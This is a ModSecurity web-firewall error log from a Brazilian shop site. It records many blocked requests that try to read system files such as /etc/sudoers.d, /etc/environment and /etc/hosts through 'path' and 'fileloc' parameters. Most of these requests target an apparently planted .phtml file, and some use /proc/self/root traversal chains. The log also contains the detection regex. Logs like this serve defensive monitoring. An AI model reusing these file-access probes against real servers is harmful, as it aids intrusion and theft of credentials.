[Fri Mar 20 08:59:48.523464 2026] [:error] [pid 21219:tid 140411632822016] [client 57.141.18.112:36376] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02s_XLqtnMIWvjpaKmLAAAAo0"]
[Fri Mar 20 08:59:48.736048 2026] [:error] [pid 15826:tid 140411683178240] [client 57.141.18.18:36414] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02tOoXxyEfFpUF8f-MEgAAAUc"]
[Fri Mar 20 08:59:48.787237 2026] [:error] [pid 9818:tid 140411741927168] [client 57.141.18.63:36418] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02tF1pVZ5mVmJwsFM9OQAAAEA"]
[Fri Mar 20 08:59:49.247199 2026] [:error] [pid 11167:tid 140411565680384] [client 57.141.18.102:36440] [client 57.141.18.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02tfHIg5MgXLBnicMCcwAAAdU"]
[Fri Mar 20 08:59:49.415335 2026] [:error] [pid 15826:tid 140411725141760] [client 57.141.18.58:36446] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02teoXxyEfFpUF8f-MEwAAAUI"]
[Fri Mar 20 08:59:49.427145 2026] [:error] [pid 7235:tid 140411607643904] [client 216.73.216.191:55281] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02tfqxLDW4GITHUkT1BQAAARA"]
[Fri Mar 20 08:59:50.047402 2026] [:error] [pid 31215:tid 140411616036608] [client 57.141.18.4:36486] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02tgF0L0L-SsrnPo50XgAAAs8"]
[Fri Mar 20 08:59:50.381302 2026] [:error] [pid 7893:tid 140411666392832] [client 57.141.18.14:36506] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02thCii7xarUs8iHZzAQAAAgk"]
[Fri Mar 20 08:59:50.663784 2026] [:error] [pid 11167:tid 140411540502272] [client 57.141.18.79:36524] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02tvHIg5MgXLBnicMCdAAAAdg"]
[Fri Mar 20 08:59:50.880231 2026] [:error] [pid 7893:tid 140411699963648] [client 57.141.18.58:36536] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02thCii7xarUs8iHZzAgAAAgU"]
[Fri Mar 20 08:59:50.907999 2026] [:error] [pid 11642:tid 140411557287680] [client 74.7.243.128:56996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02trninkcc-iUj5AppmAAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:51.216468 2026] [:error] [pid 31215:tid 140411649607424] [client 57.141.18.95:36556] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02twF0L0L-SsrnPo50YAAAAss"]
[Fri Mar 20 08:59:51.619795 2026] [:error] [pid 31215:tid 140411557287680] [client 57.141.18.6:36584] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02twF0L0L-SsrnPo50ZAAAAtY"]
[Fri Mar 20 08:59:52.095588 2026] [:error] [pid 10189:tid 140411590858496] [client 57.141.18.2:36604] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02uDJ3M9BSuKP7CAYqmAAAAJI"]
[Fri Mar 20 08:59:52.270856 2026] [:error] [pid 11167:tid 140411699963648] [client 74.7.243.128:39412] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02uPHIg5MgXLBnicMCdgAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:52.399033 2026] [:error] [pid 11167:tid 140411708356352] [client 57.141.18.87:36620] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02uPHIg5MgXLBnicMCdwAAAcQ"]
[Fri Mar 20 08:59:52.567778 2026] [:error] [pid 11642:tid 140411632822016] [client 57.141.18.102:36640] [client 57.141.18.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02uLninkcc-iUj5AppmwAAA40"]
[Fri Mar 20 08:59:54.403380 2026] [:error] [pid 11167:tid 140411599251200] [client 57.141.18.79:36668] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02ufHIg5MgXLBnicMCegAAAdE"]
[Fri Mar 20 08:59:54.404521 2026] [:error] [pid 7893:tid 140411624429312] [client 57.141.18.85:36690] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02uhCii7xarUs8iHZzBwAAAg4"]
[Fri Mar 20 08:59:54.409342 2026] [:error] [pid 7893:tid 140411641214720] [client 57.141.18.78:36694] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02uhCii7xarUs8iHZzCAAAAgw"]
[Fri Mar 20 08:59:54.426712 2026] [:error] [pid 21219:tid 140411641214720] [client 57.141.18.54:36662] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02ufXLqtnMIWvjpaKmNgAAAow"]
[Fri Mar 20 08:59:54.427889 2026] [:error] [pid 15826:tid 140411658000128] [client 57.141.18.114:36686] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02ueoXxyEfFpUF8f-MGwAAAUo"]
[Fri Mar 20 08:59:54.867036 2026] [:error] [pid 10189:tid 140411599251200] [client 57.141.18.61:36726] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02ujJ3M9BSuKP7CAYqmgAAAJE"]
[Fri Mar 20 08:59:55.256512 2026] [:error] [pid 11642:tid 140411658000128] [client 57.141.18.76:36750] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02u7ninkcc-iUj5AppnwAAA4o"]
[Fri Mar 20 08:59:55.549498 2026] [:error] [pid 9818:tid 140411733534464] [client 57.141.18.89:36756] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02u11pVZ5mVmJwsFM9SAAAAEE"]
[Fri Mar 20 08:59:56.071564 2026] [:error] [pid 21219:tid 140411624429312] [client 57.141.18.11:36782] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02vPXLqtnMIWvjpaKmOQAAAo4"]
[Fri Mar 20 08:59:56.193467 2026] [:error] [pid 10189:tid 140411548894976] [client 57.141.18.90:36790] [client 57.141.18.90] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02vDJ3M9BSuKP7CAYqnQAAAJc"]
[Fri Mar 20 08:59:56.549023 2026] [:error] [pid 9818:tid 140411649607424] [client 57.141.18.67:36826] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02vF1pVZ5mVmJwsFM9SgAAAEs"]
